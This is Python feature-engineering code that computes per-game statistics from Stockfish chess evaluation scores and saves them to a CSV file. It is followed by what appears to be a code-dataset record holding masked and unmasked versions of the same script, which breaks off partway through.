black_q2_stdev.append(np.std(np.array((black_improve[len(black_improve)//4 : (len(black_improve)//4)*2]))))
black_q3_stdev.append(np.std(np.array((black_improve[(len(black_improve)//4)*2 : (len(black_improve)//4)*3]))))
black_q4_stdev.append(np.std(np.array((black_improve[(len(black_improve)//4)*3 : ]))))
if len(white_improve) >=5:
white_5_improve.append( sum(white_improve[0:5])/5 )
else:
white_5_improve.append(white_avg)
if len(white_improve) >=10:
white_10_improve.append( sum(white_improve[5:10])/5 )
else:
white_10_improve.append(white_avg)
if len(white_improve) >=15:
white_15_improve.append( sum(white_improve[10:15])/5 )
else:
white_15_improve.append(white_avg)
if len(white_improve) >=20:
white_20_improve.append( sum(white_improve[15:20])/5 )
else:
white_20_improve.append(white_avg)
if len(white_improve) >=25:
white_25_improve.append( sum(white_improve[20:25])/5 )
else:
white_25_improve.append(white_avg)
if len(white_improve) >=30:
white_30_improve.append( sum(white_improve[25:30])/5 )
else:
white_30_improve.append(white_avg)
if len(white_improve) >=35:
white_35_improve.append( sum(white_improve[30:35])/5 )
else:
white_35_improve.append(white_avg)
if len(white_improve) >=40:
white_40_improve.append( sum(white_improve[35:40])/5 )
else:
white_40_improve.append(white_avg)
if len(white_improve) >=45:
white_45_improve.append( sum(white_improve[40:45])/5 )
else:
white_45_improve.append(white_avg)
if len(white_improve) >=50:
white_50_improve.append( sum(white_improve[45:50])/5 )
else:
white_50_improve.append(white_avg)
if len(white_improve) >=55:
white_55_improve.append( sum(white_improve[50:55])/5 )
else:
white_55_improve.append(white_avg)
if len(white_improve) >=60:
white_60_improve.append( sum(white_improve[55:60])/5 )
else:
white_60_improve.append(white_avg)
if len(white_improve) >=65:
white_65_improve.append( sum(white_improve[60:65])/5 )
else:
white_65_improve.append(white_avg)
if len(white_improve) >=70:
white_70_improve.append( sum(white_improve[65:70])/5 )
else:
white_70_improve.append(white_avg)
if len(white_improve) >=75:
white_75_improve.append( sum(white_improve[70:75])/5 )
else:
white_75_improve.append(white_avg)
if len(black_improve) >=5:
black_5_improve.append( sum(black_improve[0:5])/5 )
else:
black_5_improve.append(black_avg)
if len(black_improve) >=10:
black_10_improve.append( sum(black_improve[5:10])/5 )
else:
black_10_improve.append(black_avg)
if len(black_improve) >=15:
black_15_improve.append( sum(black_improve[10:15])/5 )
else:
black_15_improve.append(black_avg)
if len(black_improve) >=20:
black_20_improve.append( sum(black_improve[15:20])/5 )
else:
black_20_improve.append(black_avg)
if len(black_improve) >=25:
black_25_improve.append( sum(black_improve[20:25])/5 )
else:
black_25_improve.append(black_avg)
if len(black_improve) >=30:
black_30_improve.append( sum(black_improve[25:30])/5 )
else:
black_30_improve.append(black_avg)
if len(black_improve) >=35:
black_35_improve.append( sum(black_improve[30:35])/5 )
else:
black_35_improve.append(black_avg)
if len(black_improve) >=40:
black_40_improve.append( sum(black_improve[35:40])/5 )
else:
black_40_improve.append(black_avg)
if len(black_improve) >=45:
black_45_improve.append( sum(black_improve[40:45])/5 )
else:
black_45_improve.append(black_avg)
if len(black_improve) >=50:
black_50_improve.append( sum(black_improve[45:50])/5 )
else:
black_50_improve.append(black_avg)
if len(black_improve) >=55:
black_55_improve.append( sum(black_improve[50:55])/5 )
else:
black_55_improve.append(black_avg)
if len(black_improve) >=60:
black_60_improve.append( sum(black_improve[55:60])/5 )
else:
black_60_improve.append(black_avg)
if len(black_improve) >=65:
black_65_improve.append( sum(black_improve[60:65])/5 )
else:
black_65_improve.append(black_avg)
if len(black_improve) >=70:
black_70_improve.append( sum(black_improve[65:70])/5 )
else:
black_70_improve.append(black_avg)
if len(black_improve) >=75:
black_75_improve.append( sum(black_improve[70:75])/5 )
else:
black_75_improve.append(black_avg)
if len(game_nums)>10:
game_score10.append(game_nums[10])
else:
game_score10.append(0)
if len(game_nums)>20:
game_score20.append(game_nums[20])
else:
game_score20.append(0)
if len(game_nums)>30:
game_score30.append(game_nums[30])
else:
game_score30.append(0)
if len(game_nums)>40:
game_score40.append(game_nums[40])
else:
game_score40.append(0)
if len(game_nums)>50:
game_score50.append(game_nums[50])
else:
game_score50.append(0)
if len(game_nums)>60:
game_score60.append(game_nums[60])
else:
game_score60.append(0)
if len(game_nums)>70:
game_score70.append(game_nums[70])
else:
game_score70.append(0)
if len(game_nums)>80:
game_score80.append(game_nums[80])
else:
game_score80.append(0)
if len(game_nums)>90:
game_score90.append(game_nums[90])
else:
game_score90.append(0)
if len(game_nums)>100:
game_score100.append(game_nums[100])
else:
game_score100.append(0)
if prev:
ending_score.append(prev)
else:
ending_score.append(0)
chess_dict = {"game_length":game_length,"average_score":average_score,"score_stdev":score_stdev,"largest_gain":largest_gain,
"largest_drop":largest_drop,"max_score":max_score,"min_score":min_score,
"ending_score":ending_score, "white_avg_improve":white_avg_improve,
"black_avg_improve":black_avg_improve,"white_median_improve":white_median_improve,
"black_median_improve":black_median_improve,"white_q1_improve":white_q1_improve,
"white_q2_improve":white_q2_improve,
"white_q3_improve":white_q3_improve,
"white_q4_improve":white_q4_improve,"black_q1_improve":black_q1_improve,
"black_q2_improve":black_q2_improve,
"black_q3_improve":black_q3_improve,
"black_q4_improve":black_q4_improve,
'white_5_improve': white_5_improve,
'white_10_improve': white_10_improve,
'white_15_improve': white_15_improve,
'white_20_improve': white_20_improve,
'white_25_improve': white_25_improve,
'white_30_improve': white_30_improve,
'white_35_improve': white_35_improve,
'white_40_improve': white_40_improve,
'white_45_improve': white_45_improve,
'white_50_improve': white_50_improve,
'white_55_improve': white_55_improve,
'white_60_improve': white_60_improve,
'white_65_improve': white_65_improve,
'white_70_improve': white_70_improve,
'white_75_improve': white_75_improve,
'black_5_improve': black_5_improve,
'black_10_improve': black_10_improve,
'black_15_improve': black_15_improve,
'black_20_improve': black_20_improve,
'black_25_improve': black_25_improve,
'black_30_improve': black_30_improve,
'black_35_improve': black_35_improve,
'black_40_improve': black_40_improve,
'black_45_improve': black_45_improve,
'black_50_improve': black_50_improve,
'black_55_improve': black_55_improve,
'black_60_improve': black_60_improve,
'black_65_improve': black_65_improve,
'black_70_improve': black_70_improve,
'black_75_improve': black_75_improve,
'white_q1_max': white_q1_max,
'white_q2_max': white_q2_max,
'white_q3_max': white_q3_max,
'white_q4_max': white_q4_max,
'black_q1_max': black_q1_max,
'black_q2_max': black_q2_max,
'black_q3_max': black_q3_max,
'black_q4_max': black_q4_max,
'white_q1_min': white_q1_min,
'white_q2_min': white_q2_min,
'white_q3_min': white_q3_min,
'white_q4_min': white_q4_min,
'black_q1_min': black_q1_min,
'black_q2_min': black_q2_min,
'black_q3_min': black_q3_min,
'black_q4_min': black_q4_min,
'white_q1_stdev': white_q1_stdev,
'white_q2_stdev': white_q2_stdev,
'white_q3_stdev': white_q3_stdev,
'white_q4_stdev': white_q4_stdev,
'black_q1_stdev': black_q1_stdev,
'black_q2_stdev': black_q2_stdev,
'black_q3_stdev': black_q3_stdev,
'black_q4_stdev': black_q4_stdev,
'game_score10':game_score10,
'game_score20':game_score20,
'game_score30':game_score30,
'game_score40':game_score40,
'game_score50':game_score50,
'game_score60':game_score60,
'game_score70':game_score70,
'game_score80':game_score80,
'game_score90':game_score90,
'game_score100':game_score100
}
#Create feature data frame
chess_df = pd.DataFrame(chess_dict, index=[x for x in range(1,50001)])
chess_df.index.name = "Event"
#Write the new feature data frame to CSV
chess_df.to_csv("score_features.csv")
|
normal
|
{
"blob_id": "ad9bb34fdb05ab885f4871693729449f3618603a",
"index": 8321,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor game in raw_scores:\n game_len = len(game) + 1\n total = 0\n prev = None\n player = 1\n max_so_far = -100\n min_so_far = 100\n max_drop = 0\n max_gain = 0\n white_improve = [0]\n black_improve = [0]\n game_nums = [0]\n for score in game:\n if score != 'NA':\n score = int(score)\n game_nums.append(score)\n total += score\n if prev != None:\n change = score - prev\n if change < max_drop:\n max_drop = change\n if change > max_gain:\n max_gain = change\n if player == 1:\n black_improve.append(change)\n else:\n white_improve.append(change)\n player = abs(player - 1)\n prev = score\n if score > max_so_far:\n max_so_far = score\n if score < min_so_far:\n min_so_far = score\n white_avg = sum(white_improve) / (game_len / 2)\n black_avg = sum(black_improve) / (game_len / 2)\n game_length.append(game_len)\n average_score.append(total / game_len)\n score_stdev.append(np.std(np.array(game_nums)))\n largest_gain.append(max_gain)\n largest_drop.append(max_drop)\n max_score.append(max_so_far)\n min_score.append(min_so_far)\n white_avg_improve.append(white_avg)\n black_avg_improve.append(black_avg)\n white_median_improve.append(sorted(white_improve)[len(white_improve) // 2])\n black_median_improve.append(sorted(black_improve)[len(black_improve) // 2])\n white_q1_improve.append(sum(white_improve[0:len(white_improve) // 4]) /\n len(white_improve) // 4)\n white_q2_improve.append(sum(white_improve[len(white_improve) // 4:len(\n white_improve) // 4 * 2]) / len(white_improve) // 4)\n white_q3_improve.append(sum(white_improve[len(white_improve) // 4 * 2:\n len(white_improve) // 4 * 3]) / len(white_improve) // 4)\n white_q4_improve.append(sum(white_improve[len(white_improve) // 4 * 3:]\n ) / len(white_improve) // 4)\n black_q1_improve.append(sum(black_improve[0:len(black_improve) // 4]) /\n len(black_improve) // 4)\n black_q2_improve.append(sum(black_improve[len(black_improve) // 4:len(\n black_improve) // 4 * 2]) / len(black_improve) // 4)\n black_q3_improve.append(sum(black_improve[len(black_improve) // 4 * 2:\n len(black_improve) // 4 * 3]) / len(black_improve) // 4)\n black_q4_improve.append(sum(black_improve[len(black_improve) // 4 * 3:]\n ) / len(black_improve) // 4)\n white_q1_max.append(max(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_max.append(max(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_max.append(max(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_max.append(max(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_max.append(max(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_max.append(max(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_max.append(max(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_max.append(max(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_min.append(min(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_min.append(min(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_min.append(min(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_min.append(min(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_min.append(min(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_min.append(min(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_min.append(min(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_min.append(min(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_stdev.append(np.std(np.array(white_improve[0:len(white_improve\n ) // 4])))\n white_q2_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4:len(white_improve) // 4 * 2])))\n white_q3_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 2:len(white_improve) // 4 * 3])))\n white_q4_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 3:])))\n black_q1_stdev.append(np.std(np.array(black_improve[0:len(black_improve\n ) // 4])))\n black_q2_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4:len(black_improve) // 4 * 2])))\n black_q3_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 2:len(black_improve) // 4 * 3])))\n black_q4_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 3:])))\n if len(white_improve) >= 5:\n white_5_improve.append(sum(white_improve[0:5]) / 5)\n else:\n white_5_improve.append(white_avg)\n if len(white_improve) >= 10:\n white_10_improve.append(sum(white_improve[5:10]) / 5)\n else:\n white_10_improve.append(white_avg)\n if len(white_improve) >= 15:\n white_15_improve.append(sum(white_improve[10:15]) / 5)\n else:\n white_15_improve.append(white_avg)\n if len(white_improve) >= 20:\n white_20_improve.append(sum(white_improve[15:20]) / 5)\n else:\n white_20_improve.append(white_avg)\n if len(white_improve) >= 25:\n white_25_improve.append(sum(white_improve[20:25]) / 5)\n else:\n white_25_improve.append(white_avg)\n if len(white_improve) >= 30:\n white_30_improve.append(sum(white_improve[25:30]) / 5)\n else:\n white_30_improve.append(white_avg)\n if len(white_improve) >= 35:\n white_35_improve.append(sum(white_improve[30:35]) / 5)\n else:\n white_35_improve.append(white_avg)\n if len(white_improve) >= 40:\n white_40_improve.append(sum(white_improve[35:40]) / 5)\n else:\n white_40_improve.append(white_avg)\n if len(white_improve) >= 45:\n white_45_improve.append(sum(white_improve[40:45]) / 5)\n else:\n white_45_improve.append(white_avg)\n if len(white_improve) >= 50:\n white_50_improve.append(sum(white_improve[45:50]) / 5)\n else:\n white_50_improve.append(white_avg)\n if len(white_improve) >= 55:\n white_55_improve.append(sum(white_improve[50:55]) / 5)\n else:\n white_55_improve.append(white_avg)\n if len(white_improve) >= 60:\n white_60_improve.append(sum(white_improve[55:60]) / 5)\n else:\n white_60_improve.append(white_avg)\n if len(white_improve) >= 65:\n white_65_improve.append(sum(white_improve[60:65]) / 5)\n else:\n white_65_improve.append(white_avg)\n if len(white_improve) >= 70:\n white_70_improve.append(sum(white_improve[65:70]) / 5)\n else:\n white_70_improve.append(white_avg)\n if len(white_improve) >= 75:\n white_75_improve.append(sum(white_improve[70:75]) / 5)\n else:\n white_75_improve.append(white_avg)\n if len(black_improve) >= 5:\n black_5_improve.append(sum(black_improve[0:5]) / 5)\n else:\n black_5_improve.append(black_avg)\n if len(black_improve) >= 10:\n black_10_improve.append(sum(black_improve[5:10]) / 5)\n else:\n black_10_improve.append(black_avg)\n if len(black_improve) >= 15:\n black_15_improve.append(sum(black_improve[10:15]) / 5)\n else:\n black_15_improve.append(black_avg)\n if len(black_improve) >= 20:\n black_20_improve.append(sum(black_improve[15:20]) / 5)\n else:\n black_20_improve.append(black_avg)\n if len(black_improve) >= 25:\n black_25_improve.append(sum(black_improve[20:25]) / 5)\n else:\n black_25_improve.append(black_avg)\n if len(black_improve) >= 30:\n black_30_improve.append(sum(black_improve[25:30]) / 5)\n else:\n black_30_improve.append(black_avg)\n if len(black_improve) >= 35:\n black_35_improve.append(sum(black_improve[30:35]) / 5)\n else:\n black_35_improve.append(black_avg)\n if len(black_improve) >= 40:\n black_40_improve.append(sum(black_improve[35:40]) / 5)\n else:\n black_40_improve.append(black_avg)\n if len(black_improve) >= 45:\n black_45_improve.append(sum(black_improve[40:45]) / 5)\n else:\n black_45_improve.append(black_avg)\n if len(black_improve) >= 50:\n black_50_improve.append(sum(black_improve[45:50]) / 5)\n else:\n black_50_improve.append(black_avg)\n if len(black_improve) >= 55:\n black_55_improve.append(sum(black_improve[50:55]) / 5)\n else:\n black_55_improve.append(black_avg)\n if len(black_improve) >= 60:\n black_60_improve.append(sum(black_improve[55:60]) / 5)\n else:\n black_60_improve.append(black_avg)\n if len(black_improve) >= 65:\n black_65_improve.append(sum(black_improve[60:65]) / 5)\n else:\n black_65_improve.append(black_avg)\n if len(black_improve) >= 70:\n black_70_improve.append(sum(black_improve[65:70]) / 5)\n else:\n black_70_improve.append(black_avg)\n if len(black_improve) >= 75:\n black_75_improve.append(sum(black_improve[70:75]) / 5)\n else:\n black_75_improve.append(black_avg)\n if len(game_nums) > 10:\n game_score10.append(game_nums[10])\n else:\n game_score10.append(0)\n if len(game_nums) > 20:\n game_score20.append(game_nums[20])\n else:\n game_score20.append(0)\n if len(game_nums) > 30:\n game_score30.append(game_nums[30])\n else:\n game_score30.append(0)\n if len(game_nums) > 40:\n game_score40.append(game_nums[40])\n else:\n game_score40.append(0)\n if len(game_nums) > 50:\n game_score50.append(game_nums[50])\n else:\n game_score50.append(0)\n if len(game_nums) > 60:\n game_score60.append(game_nums[60])\n else:\n game_score60.append(0)\n if len(game_nums) > 70:\n game_score70.append(game_nums[70])\n else:\n game_score70.append(0)\n if len(game_nums) > 80:\n game_score80.append(game_nums[80])\n else:\n game_score80.append(0)\n if len(game_nums) > 90:\n game_score90.append(game_nums[90])\n else:\n game_score90.append(0)\n if len(game_nums) > 100:\n game_score100.append(game_nums[100])\n else:\n game_score100.append(0)\n if prev:\n ending_score.append(prev)\n else:\n ending_score.append(0)\n<mask token>\nchess_df.to_csv('score_features.csv')\n",
"step-3": "<mask token>\nraw_scores = [line.strip().split(',')[1].split() for line in open(\n 'stockfish.csv')][1:]\ngame_length = []\naverage_score = []\nscore_stdev = []\nlargest_gain = []\nlargest_drop = []\nmax_score = []\nmin_score = []\nending_score = []\nwhite_avg_improve = []\nblack_avg_improve = []\nwhite_median_improve = []\nblack_median_improve = []\nwhite_q1_improve = []\nwhite_q2_improve = []\nwhite_q3_improve = []\nwhite_q4_improve = []\nblack_q1_improve = []\nblack_q2_improve = []\nblack_q3_improve = []\nblack_q4_improve = []\ngame_score10 = []\ngame_score20 = []\ngame_score30 = []\ngame_score40 = []\ngame_score50 = []\ngame_score60 = []\ngame_score70 = []\ngame_score80 = []\ngame_score90 = []\ngame_score100 = []\nwhite_q1_max = []\nwhite_q2_max = []\nwhite_q3_max = []\nwhite_q4_max = []\nblack_q1_max = []\nblack_q2_max = []\nblack_q3_max = []\nblack_q4_max = []\nwhite_q1_min = []\nwhite_q2_min = []\nwhite_q3_min = []\nwhite_q4_min = []\nblack_q1_min = []\nblack_q2_min = []\nblack_q3_min = []\nblack_q4_min = []\nwhite_q1_stdev = []\nwhite_q2_stdev = []\nwhite_q3_stdev = []\nwhite_q4_stdev = []\nblack_q1_stdev = []\nblack_q2_stdev = []\nblack_q3_stdev = []\nblack_q4_stdev = []\nwhite_5_improve = []\nwhite_10_improve = []\nwhite_15_improve = []\nwhite_20_improve = []\nwhite_25_improve = []\nwhite_30_improve = []\nwhite_35_improve = []\nwhite_40_improve = []\nwhite_45_improve = []\nwhite_50_improve = []\nwhite_55_improve = []\nwhite_60_improve = []\nwhite_65_improve = []\nwhite_70_improve = []\nwhite_75_improve = []\nblack_5_improve = []\nblack_10_improve = []\nblack_15_improve = []\nblack_20_improve = []\nblack_25_improve = []\nblack_30_improve = []\nblack_35_improve = []\nblack_40_improve = []\nblack_45_improve = []\nblack_50_improve = []\nblack_55_improve = []\nblack_60_improve = []\nblack_65_improve = []\nblack_70_improve = []\nblack_75_improve = []\nfor game in raw_scores:\n game_len = len(game) + 1\n total = 0\n prev = None\n player = 1\n max_so_far = -100\n min_so_far = 100\n max_drop = 0\n max_gain = 0\n white_improve = [0]\n black_improve = [0]\n game_nums = [0]\n for score in game:\n if score != 'NA':\n score = int(score)\n game_nums.append(score)\n total += score\n if prev != None:\n change = score - prev\n if change < max_drop:\n max_drop = change\n if change > max_gain:\n max_gain = change\n if player == 1:\n black_improve.append(change)\n else:\n white_improve.append(change)\n player = abs(player - 1)\n prev = score\n if score > max_so_far:\n max_so_far = score\n if score < min_so_far:\n min_so_far = score\n white_avg = sum(white_improve) / (game_len / 2)\n black_avg = sum(black_improve) / (game_len / 2)\n game_length.append(game_len)\n average_score.append(total / game_len)\n score_stdev.append(np.std(np.array(game_nums)))\n largest_gain.append(max_gain)\n largest_drop.append(max_drop)\n max_score.append(max_so_far)\n min_score.append(min_so_far)\n white_avg_improve.append(white_avg)\n black_avg_improve.append(black_avg)\n white_median_improve.append(sorted(white_improve)[len(white_improve) // 2])\n black_median_improve.append(sorted(black_improve)[len(black_improve) // 2])\n white_q1_improve.append(sum(white_improve[0:len(white_improve) // 4]) /\n len(white_improve) // 4)\n white_q2_improve.append(sum(white_improve[len(white_improve) // 4:len(\n white_improve) // 4 * 2]) / len(white_improve) // 4)\n white_q3_improve.append(sum(white_improve[len(white_improve) // 4 * 2:\n len(white_improve) // 4 * 3]) / len(white_improve) // 4)\n white_q4_improve.append(sum(white_improve[len(white_improve) // 4 * 3:]\n ) / len(white_improve) // 4)\n black_q1_improve.append(sum(black_improve[0:len(black_improve) // 4]) /\n len(black_improve) // 4)\n black_q2_improve.append(sum(black_improve[len(black_improve) // 4:len(\n black_improve) // 4 * 2]) / len(black_improve) // 4)\n black_q3_improve.append(sum(black_improve[len(black_improve) // 4 * 2:\n len(black_improve) // 4 * 3]) / len(black_improve) // 4)\n black_q4_improve.append(sum(black_improve[len(black_improve) // 4 * 3:]\n ) / len(black_improve) // 4)\n white_q1_max.append(max(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_max.append(max(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_max.append(max(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_max.append(max(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_max.append(max(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_max.append(max(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_max.append(max(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_max.append(max(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_min.append(min(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_min.append(min(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_min.append(min(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_min.append(min(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_min.append(min(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_min.append(min(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_min.append(min(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_min.append(min(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_stdev.append(np.std(np.array(white_improve[0:len(white_improve\n ) // 4])))\n white_q2_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4:len(white_improve) // 4 * 2])))\n white_q3_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 2:len(white_improve) // 4 * 3])))\n white_q4_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 3:])))\n black_q1_stdev.append(np.std(np.array(black_improve[0:len(black_improve\n ) // 4])))\n black_q2_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4:len(black_improve) // 4 * 2])))\n black_q3_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 2:len(black_improve) // 4 * 3])))\n black_q4_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 3:])))\n if len(white_improve) >= 5:\n white_5_improve.append(sum(white_improve[0:5]) / 5)\n else:\n white_5_improve.append(white_avg)\n if len(white_improve) >= 10:\n white_10_improve.append(sum(white_improve[5:10]) / 5)\n else:\n white_10_improve.append(white_avg)\n if len(white_improve) >= 15:\n white_15_improve.append(sum(white_improve[10:15]) / 5)\n else:\n white_15_improve.append(white_avg)\n if len(white_improve) >= 20:\n white_20_improve.append(sum(white_improve[15:20]) / 5)\n else:\n white_20_improve.append(white_avg)\n if len(white_improve) >= 25:\n white_25_improve.append(sum(white_improve[20:25]) / 5)\n else:\n white_25_improve.append(white_avg)\n if len(white_improve) >= 30:\n white_30_improve.append(sum(white_improve[25:30]) / 5)\n else:\n white_30_improve.append(white_avg)\n if len(white_improve) >= 35:\n white_35_improve.append(sum(white_improve[30:35]) / 5)\n else:\n white_35_improve.append(white_avg)\n if len(white_improve) >= 40:\n white_40_improve.append(sum(white_improve[35:40]) / 5)\n else:\n white_40_improve.append(white_avg)\n if len(white_improve) >= 45:\n white_45_improve.append(sum(white_improve[40:45]) / 5)\n else:\n white_45_improve.append(white_avg)\n if len(white_improve) >= 50:\n white_50_improve.append(sum(white_improve[45:50]) / 5)\n else:\n white_50_improve.append(white_avg)\n if len(white_improve) >= 55:\n white_55_improve.append(sum(white_improve[50:55]) / 5)\n else:\n white_55_improve.append(white_avg)\n if len(white_improve) >= 60:\n white_60_improve.append(sum(white_improve[55:60]) / 5)\n else:\n white_60_improve.append(white_avg)\n if len(white_improve) >= 65:\n white_65_improve.append(sum(white_improve[60:65]) / 5)\n else:\n white_65_improve.append(white_avg)\n if len(white_improve) >= 70:\n white_70_improve.append(sum(white_improve[65:70]) / 5)\n else:\n white_70_improve.append(white_avg)\n if len(white_improve) >= 75:\n white_75_improve.append(sum(white_improve[70:75]) / 5)\n else:\n white_75_improve.append(white_avg)\n if len(black_improve) >= 5:\n black_5_improve.append(sum(black_improve[0:5]) / 5)\n else:\n black_5_improve.append(black_avg)\n if len(black_improve) >= 10:\n black_10_improve.append(sum(black_improve[5:10]) / 5)\n else:\n black_10_improve.append(black_avg)\n if len(black_improve) >= 15:\n black_15_improve.append(sum(black_improve[10:15]) / 5)\n else:\n black_15_improve.append(black_avg)\n if len(black_improve) >= 20:\n black_20_improve.append(sum(black_improve[15:20]) / 5)\n else:\n black_20_improve.append(black_avg)\n if len(black_improve) >= 25:\n black_25_improve.append(sum(black_improve[20:25]) / 5)\n else:\n black_25_improve.append(black_avg)\n if len(black_improve) >= 30:\n black_30_improve.append(sum(black_improve[25:30]) / 5)\n else:\n black_30_improve.append(black_avg)\n if len(black_improve) >= 35:\n black_35_improve.append(sum(black_improve[30:35]) / 5)\n else:\n black_35_improve.append(black_avg)\n if len(black_improve) >= 40:\n black_40_improve.append(sum(black_improve[35:40]) / 5)\n else:\n black_40_improve.append(black_avg)\n if len(black_improve) >= 45:\n black_45_improve.append(sum(black_improve[40:45]) / 5)\n else:\n black_45_improve.append(black_avg)\n if len(black_improve) >= 50:\n black_50_improve.append(sum(black_improve[45:50]) / 5)\n else:\n black_50_improve.append(black_avg)\n if len(black_improve) >= 55:\n black_55_improve.append(sum(black_improve[50:55]) / 5)\n else:\n black_55_improve.append(black_avg)\n if len(black_improve) >= 60:\n black_60_improve.append(sum(black_improve[55:60]) / 5)\n else:\n black_60_improve.append(black_avg)\n if len(black_improve) >= 65:\n black_65_improve.append(sum(black_improve[60:65]) / 5)\n else:\n black_65_improve.append(black_avg)\n if len(black_improve) >= 70:\n black_70_improve.append(sum(black_improve[65:70]) / 5)\n else:\n black_70_improve.append(black_avg)\n if len(black_improve) >= 75:\n black_75_improve.append(sum(black_improve[70:75]) / 5)\n else:\n black_75_improve.append(black_avg)\n if len(game_nums) > 10:\n game_score10.append(game_nums[10])\n else:\n game_score10.append(0)\n if len(game_nums) > 20:\n game_score20.append(game_nums[20])\n else:\n game_score20.append(0)\n if len(game_nums) > 30:\n game_score30.append(game_nums[30])\n else:\n game_score30.append(0)\n if len(game_nums) > 40:\n game_score40.append(game_nums[40])\n else:\n game_score40.append(0)\n if len(game_nums) > 50:\n game_score50.append(game_nums[50])\n else:\n game_score50.append(0)\n if len(game_nums) > 60:\n game_score60.append(game_nums[60])\n else:\n game_score60.append(0)\n if len(game_nums) > 70:\n game_score70.append(game_nums[70])\n else:\n game_score70.append(0)\n if len(game_nums) > 80:\n game_score80.append(game_nums[80])\n else:\n game_score80.append(0)\n if len(game_nums) > 90:\n game_score90.append(game_nums[90])\n else:\n game_score90.append(0)\n if len(game_nums) > 100:\n game_score100.append(game_nums[100])\n else:\n game_score100.append(0)\n if prev:\n ending_score.append(prev)\n else:\n ending_score.append(0)\nchess_dict = {'game_length': game_length, 'average_score': average_score,\n 'score_stdev': score_stdev, 'largest_gain': largest_gain,\n 'largest_drop': largest_drop, 'max_score': max_score, 'min_score':\n min_score, 'ending_score': ending_score, 'white_avg_improve':\n white_avg_improve, 'black_avg_improve': black_avg_improve,\n 'white_median_improve': white_median_improve, 'black_median_improve':\n black_median_improve, 'white_q1_improve': white_q1_improve,\n 'white_q2_improve': white_q2_improve, 'white_q3_improve':\n white_q3_improve, 'white_q4_improve': white_q4_improve,\n 'black_q1_improve': black_q1_improve, 'black_q2_improve':\n black_q2_improve, 'black_q3_improve': black_q3_improve,\n 'black_q4_improve': black_q4_improve, 'white_5_improve':\n white_5_improve, 'white_10_improve': white_10_improve,\n 'white_15_improve': white_15_improve, 'white_20_improve':\n white_20_improve, 'white_25_improve': white_25_improve,\n 'white_30_improve': white_30_improve, 'white_35_improve':\n white_35_improve, 'white_40_improve': white_40_improve,\n 'white_45_improve': white_45_improve, 'white_50_improve':\n white_50_improve, 'white_55_improve': white_55_improve,\n 'white_60_improve': white_60_improve, 'white_65_improve':\n white_65_improve, 'white_70_improve': white_70_improve,\n 'white_75_improve': white_75_improve, 'black_5_improve':\n black_5_improve, 'black_10_improve': black_10_improve,\n 'black_15_improve': black_15_improve, 'black_20_improve':\n black_20_improve, 'black_25_improve': black_25_improve,\n 'black_30_improve': black_30_improve, 'black_35_improve':\n black_35_improve, 'black_40_improve': black_40_improve,\n 'black_45_improve': black_45_improve, 'black_50_improve':\n black_50_improve, 'black_55_improve': black_55_improve,\n 'black_60_improve': black_60_improve, 'black_65_improve':\n black_65_improve, 'black_70_improve': black_70_improve,\n 'black_75_improve': black_75_improve, 'white_q1_max': white_q1_max,\n 'white_q2_max': white_q2_max, 'white_q3_max': white_q3_max,\n 'white_q4_max': white_q4_max, 'black_q1_max': black_q1_max,\n 'black_q2_max': black_q2_max, 'black_q3_max': black_q3_max,\n 'black_q4_max': black_q4_max, 'white_q1_min': white_q1_min,\n 'white_q2_min': white_q2_min, 'white_q3_min': white_q3_min,\n 'white_q4_min': white_q4_min, 'black_q1_min': black_q1_min,\n 'black_q2_min': black_q2_min, 'black_q3_min': black_q3_min,\n 'black_q4_min': black_q4_min, 'white_q1_stdev': white_q1_stdev,\n 'white_q2_stdev': white_q2_stdev, 'white_q3_stdev': white_q3_stdev,\n 'white_q4_stdev': white_q4_stdev, 'black_q1_stdev': 